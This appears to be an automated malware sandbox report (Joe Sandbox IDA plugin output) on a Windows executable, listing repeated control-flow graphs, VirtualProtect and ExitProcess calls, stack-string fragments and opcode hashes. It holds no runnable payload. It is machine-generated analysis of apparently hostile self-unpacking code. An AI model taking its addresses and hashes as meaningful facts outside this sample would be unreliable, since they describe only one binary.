                                                                                                      control_flow_graph 1279 41d9a0-41d9d7 1280 41d9e5-41da3c 1279->1280 1281 41d9d9-41d9e3 1279->1281 1283 41da4a 1280->1283 1284 41da3e-41da48 1280->1284 1282 41da54-41da5b 1281->1282 1285 41da6b-41da76 1282->1285 1286 41da5d-41da69 1282->1286 1283->1282 1284->1282 1287 41da7c-41daa7 VirtualProtect 1285->1287 1286->1287 1290 41dae7-41daed 1287->1290 1291 41daa9-41dae5 call 41dad7 1287->1291 1293 41daf3-41dafa 1290->1293 1291->1293 1295 41db33-41dbd8 call 41dbd9 1293->1295 1296 41dafc-41db2e call 41db1e 1293->1296 1301 41e07c-41e475 call 41e0ed 1295->1301 1296->1301 1308 41ed87-41f488 call 41edfc ExitProcess 1301->1308 1309 41e47b-41e601 call 41e5ea 1301->1309 1317 41e603-41e60d 1309->1317 1318 41e612-41e65d 1309->1318 1321 41e8ce-41e8f5 call 41e8ee 1317->1321 1326 41e65f-41e669 1318->1326 1327 41e66e-41e674 1318->1327 1331 41e8fa 1321->1331 1326->1321 1329 41e67a-41e6d2 1327->1329 1333 41e6d9-41e7a0 call 41e6ed 1329->1333 1331->1331 1336 41e7a2-41e7b8 1333->1336 1337 41e7ba-41e7ca 1333->1337 1339 41e81d-41e824 1336->1339 1337->1333 1338 41e7d0-41e7e3 1337->1338 1338->1333 1340 41e7e9-41e7f9 1338->1340 1341 41e866-41e8b2 call 41e87e 1339->1341 1342 41e826-41e864 call 41e837 call 41e854 1339->1342 1344 41e807 1340->1344 1345 41e7fb-41e805 1340->1345 1354 41e8c4 1341->1354 1355 41e8b4-41e8be 1341->1355 1342->1321 1348 41e811-41e817 1344->1348 1345->1348 1348->1339 1354->1321 1355->1329 1355->1354
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,0041D4B0,?,?,00000000,?,0041C7A9,0041C7A9,0041C7A9,?,?), ref: 0041DA9F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID: E$L$L$P$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 544645111-215400123
                                                                                                      • Opcode ID: ccc639dac253dc6fda9ee399cf033ecd6835ea7d5665fb0346cd658a30b0c39f
                                                                                                      • Instruction ID: b808f17952eed442205a5e21355a889812823685ba188b923a2d25a2282b8ca8
                                                                                                      • Opcode Fuzzy Hash: ccc639dac253dc6fda9ee399cf033ecd6835ea7d5665fb0346cd658a30b0c39f
                                                                                                      • Instruction Fuzzy Hash: 12B1E5B1E086A88AFB218B24CC447DA7BB1AF95304F1480F9D44D57282DA7E5FC58F56
                                                                                                      Function 0041D73B Relevance: 42.2, APIs: 1, Strings: 23, Instructions: 249memoryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1356 41d73b-41d778 1358 41d78b-41d7a0 1356->1358 1359 41d77a-41d786 1356->1359 1361 41d7b3-41d7d2 1358->1361 1362 41d7a2-41d7ae 1358->1362 1360 41da7c-41daa7 VirtualProtect 1359->1360 1366 41dae7-41daed 1360->1366 1367 41daa9-41dae5 call 41dad7 1360->1367 1364 41d7e5-41d7f7 1361->1364 1365 41d7d4-41d7e0 1361->1365 1362->1360 1368 41d7f9-41d805 1364->1368 1369 41d80a-41d873 1364->1369 1365->1360 1372 41daf3-41dafa 1366->1372 1367->1372 1368->1360 1373 41da70-41da76 1369->1373 1374 41d879-41d8c3 1369->1374 1376 41db33-41dbd8 call 41dbd9 1372->1376 1377 41dafc-41db2e call 41db1e 1372->1377 1373->1360 1378 41d8d4-41d8e5 1374->1378 1386 41e07c-41e475 call 41e0ed 1376->1386 1377->1386 1381 41d986-41d9d7 1378->1381 1382 41d8eb-41d8fb 1378->1382 1392 41d9e5-41da3c 1381->1392 1393 41d9d9-41d9e3 1381->1393 1382->1381 1385 41d901-41d952 1382->1385 1390 41d954-41d976 1385->1390 1391 41d978 1385->1391 1405 41ed87-41f488 call 41edfc ExitProcess 1386->1405 1406 41e47b-41e601 call 41e5ea 1386->1406 1390->1391 1395 41d97f 1390->1395 1391->1378 1398 41da4a 1392->1398 1399 41da3e-41da48 1392->1399 1397 41da54-41da5b 1393->1397 1395->1381 1400 41da6b 1397->1400 1401 41da5d-41da69 1397->1401 1398->1397 1399->1397 1400->1373 1401->1360 1414 41e603-41e60d 1406->1414 1415 41e612-41e65d 1406->1415 1418 41e8ce-41e8f5 call 41e8ee 1414->1418 1423 41e65f-41e669 1415->1423 1424 41e66e-41e674 1415->1424 1428 41e8fa 1418->1428 1423->1418 1426 41e67a-41e6d2 1424->1426 1430 41e6d9-41e7a0 call 41e6ed 1426->1430 1428->1428 1433 41e7a2-41e7b8 1430->1433 1434 41e7ba-41e7ca 1430->1434 1436 41e81d-41e824 1433->1436 1434->1430 1435 41e7d0-41e7e3 1434->1435 1435->1430 1437 41e7e9-41e7f9 1435->1437 1438 41e866-41e8b2 call 41e87e 1436->1438 1439 41e826-41e864 call 41e837 call 41e854 1436->1439 1441 41e807 1437->1441 1442 41e7fb-41e805 1437->1442 1451 41e8c4 1438->1451 1452 41e8b4-41e8be 1438->1452 1439->1418 1445 41e811-41e817 1441->1445 1442->1445 1445->1436 1451->1418 1452->1426 1452->1451
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,0041D4B0,?,?,00000000,?,0041C7A9,0041C7A9,0041C7A9,?,?), ref: 0041DA9F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID: E$L$L$P$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 544645111-215400123
                                                                                                      • Opcode ID: 2bcd0cfcbf85545a82d39cc403110b568991cc987e3933f7c332444f556dbecf
                                                                                                      • Instruction ID: 390f7b2d618602950299c85f09403cfb5ab7aaa8a5e415f127cde44907d5d4ef
                                                                                                      • Opcode Fuzzy Hash: 2bcd0cfcbf85545a82d39cc403110b568991cc987e3933f7c332444f556dbecf
                                                                                                      • Instruction Fuzzy Hash: 1AA1E5B1E086A88AF7218B24CC447DA7BB5EF91304F1480FAC44D57282DA7E5FC58F66
                                                                                                      Function 0041D366 Relevance: 42.2, APIs: 1, Strings: 23, Instructions: 236memoryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1453 41d366-41daa7 VirtualProtect 1456 41dae7-41daed 1453->1456 1457 41daa9-41dae5 call 41dad7 1453->1457 1459 41daf3-41dafa 1456->1459 1457->1459 1461 41db33-41dbd8 call 41dbd9 1459->1461 1462 41dafc-41db2e call 41db1e 1459->1462 1467 41e07c-41e475 call 41e0ed 1461->1467 1462->1467 1474 41ed87-41f488 call 41edfc ExitProcess 1467->1474 1475 41e47b-41e601 call 41e5ea 1467->1475 1483 41e603-41e60d 1475->1483 1484 41e612-41e65d 1475->1484 1487 41e8ce-41e8f5 call 41e8ee 1483->1487 1492 41e65f-41e669 1484->1492 1493 41e66e-41e674 1484->1493 1497 41e8fa 1487->1497 1492->1487 1495 41e67a-41e6d2 1493->1495 1499 41e6d9-41e7a0 call 41e6ed 1495->1499 1497->1497 1502 41e7a2-41e7b8 1499->1502 1503 41e7ba-41e7ca 1499->1503 1505 41e81d-41e824 1502->1505 1503->1499 1504 41e7d0-41e7e3 1503->1504 1504->1499 1506 41e7e9-41e7f9 1504->1506 1507 41e866-41e8b2 call 41e87e 1505->1507 1508 41e826-41e864 call 41e837 call 41e854 1505->1508 1510 41e807 1506->1510 1511 41e7fb-41e805 1506->1511 1520 41e8c4 1507->1520 1521 41e8b4-41e8be 1507->1521 1508->1487 1514 41e811-41e817 1510->1514 1511->1514 1514->1505 1520->1487 1521->1495 1521->1520
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,0041D4B0,?,?,00000000,?,0041C7A9,0041C7A9,0041C7A9,?,?), ref: 0041DA9F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID: E$L$L$P$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 544645111-215400123
                                                                                                      • Opcode ID: c7226ce4d8babc65aa49d133c1abaeeed7181330c66aa07811fea87572a527f8
                                                                                                      • Instruction ID: 04e980b8b52cba5469b3a620b7453351448846b62901cb6e77e208d705a8c118
                                                                                                      • Opcode Fuzzy Hash: c7226ce4d8babc65aa49d133c1abaeeed7181330c66aa07811fea87572a527f8
                                                                                                      • Instruction Fuzzy Hash: C3A10471E086A88AF7218725CC447DA7BB1AF91304F1480FAC48C57282DA7E5FC58B66
                                                                                                      Function 0041D35B Relevance: 42.2, APIs: 1, Strings: 23, Instructions: 235memoryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1522 41d35b-41daa7 VirtualProtect 1525 41dae7-41daed 1522->1525 1526 41daa9-41dae5 call 41dad7 1522->1526 1528 41daf3-41dafa 1525->1528 1526->1528 1530 41db33-41dbd8 call 41dbd9 1528->1530 1531 41dafc-41db2e call 41db1e 1528->1531 1536 41e07c-41e475 call 41e0ed 1530->1536 1531->1536 1543 41ed87-41f488 call 41edfc ExitProcess 1536->1543 1544 41e47b-41e601 call 41e5ea 1536->1544 1552 41e603-41e60d 1544->1552 1553 41e612-41e65d 1544->1553 1556 41e8ce-41e8f5 call 41e8ee 1552->1556 1561 41e65f-41e669 1553->1561 1562 41e66e-41e674 1553->1562 1566 41e8fa 1556->1566 1561->1556 1564 41e67a-41e6d2 1562->1564 1568 41e6d9-41e7a0 call 41e6ed 1564->1568 1566->1566 1571 41e7a2-41e7b8 1568->1571 1572 41e7ba-41e7ca 1568->1572 1574 41e81d-41e824 1571->1574 1572->1568 1573 41e7d0-41e7e3 1572->1573 1573->1568 1575 41e7e9-41e7f9 1573->1575 1576 41e866-41e8b2 call 41e87e 1574->1576 1577 41e826-41e864 call 41e837 call 41e854 1574->1577 1579 41e807 1575->1579 1580 41e7fb-41e805 1575->1580 1589 41e8c4 1576->1589 1590 41e8b4-41e8be 1576->1590 1577->1556 1583 41e811-41e817 1579->1583 1580->1583 1583->1574 1589->1556 1590->1564 1590->1589
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,0041D4B0,?,?,00000000,?,0041C7A9,0041C7A9,0041C7A9,?,?), ref: 0041DA9F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID: E$L$L$P$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 544645111-215400123
                                                                                                      • Opcode ID: 77618743c612e8a81a817734c97babe3a00aa18ebcbfeb011a74ab6fbbe4b715
                                                                                                      • Instruction ID: 61b5d443dc4f4e4f649f086e842dae2fc1132608eb5b7b3af34297357b474543
                                                                                                      • Opcode Fuzzy Hash: 77618743c612e8a81a817734c97babe3a00aa18ebcbfeb011a74ab6fbbe4b715
                                                                                                      • Instruction Fuzzy Hash: E4A116B1E086A88AF7218725DC047DA7BB1AF91304F1480FEC48D57282DA7E5FC5CB66
                                                                                                      Function 0041CF23 Relevance: 42.2, APIs: 1, Strings: 23, Instructions: 233memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,0041D4B0,?,?,00000000,?,0041C7A9,0041C7A9,0041C7A9,?,?), ref: 0041DA9F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID: E$L$L$P$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 544645111-215400123
                                                                                                      • Opcode ID: fe5b85736ba74339083d5abd166326afceee137aad49f91fdd53e23cb558e433
                                                                                                      • Instruction ID: 2276d1c1ec174f6cde1347697b5803419bb595f2d18bd9f1b8ecaa6ed7c07880
                                                                                                      • Opcode Fuzzy Hash: fe5b85736ba74339083d5abd166326afceee137aad49f91fdd53e23cb558e433
                                                                                                      • Instruction Fuzzy Hash: 45A106B1E086A88AF7218724DC447DA7BB1AF91304F1480FED48D57282DA7E5FC5CB66
                                                                                                      Function 0041E8EE Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 166COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ExitProcess.KERNEL32(00000000,?,0041E876,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0041F488
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID: $LoadLibraryW$O8FE$XW
                                                                                                      • API String ID: 621844428-440071855
                                                                                                      • Opcode ID: 802f5e4efc38b098bcf8056a8e21256b6804f821d639b433796c904fa6d4bf59
                                                                                                      • Instruction ID: 09bfccde4bc08f55f4248539c60113ac3c1a6557da3c8313a15300f999aec71f
                                                                                                      • Opcode Fuzzy Hash: 802f5e4efc38b098bcf8056a8e21256b6804f821d639b433796c904fa6d4bf59
                                                                                                      • Instruction Fuzzy Hash: 2C7169B9E042688FEB64CF14DC84BEAB7B6AB84315F1441EAD80D67341DA396ED1CF44
                                                                                                      Function 0041ECD4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 142COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ExitProcess.KERNEL32(00000000,?,0041E876,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0041F488
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID: O8FE$XW
                                                                                                      • API String ID: 621844428-962231659
                                                                                                      • Opcode ID: 1b1fd9715b06a79fdf43c1e87cef420a2bf49959d293da5d20b0d7a5257682e9
                                                                                                      • Instruction ID: b2e075942eecd310f30e5994575fce06d179fb71898d5739f88e17399a852847
                                                                                                      • Opcode Fuzzy Hash: 1b1fd9715b06a79fdf43c1e87cef420a2bf49959d293da5d20b0d7a5257682e9
                                                                                                      • Instruction Fuzzy Hash: 7541D4F2D04114AFF7248A25DC55BFB7778EB84310F1441FBE90AD6240E67C9EC68A66
                                                                                                      Function 0040734C Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 157COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
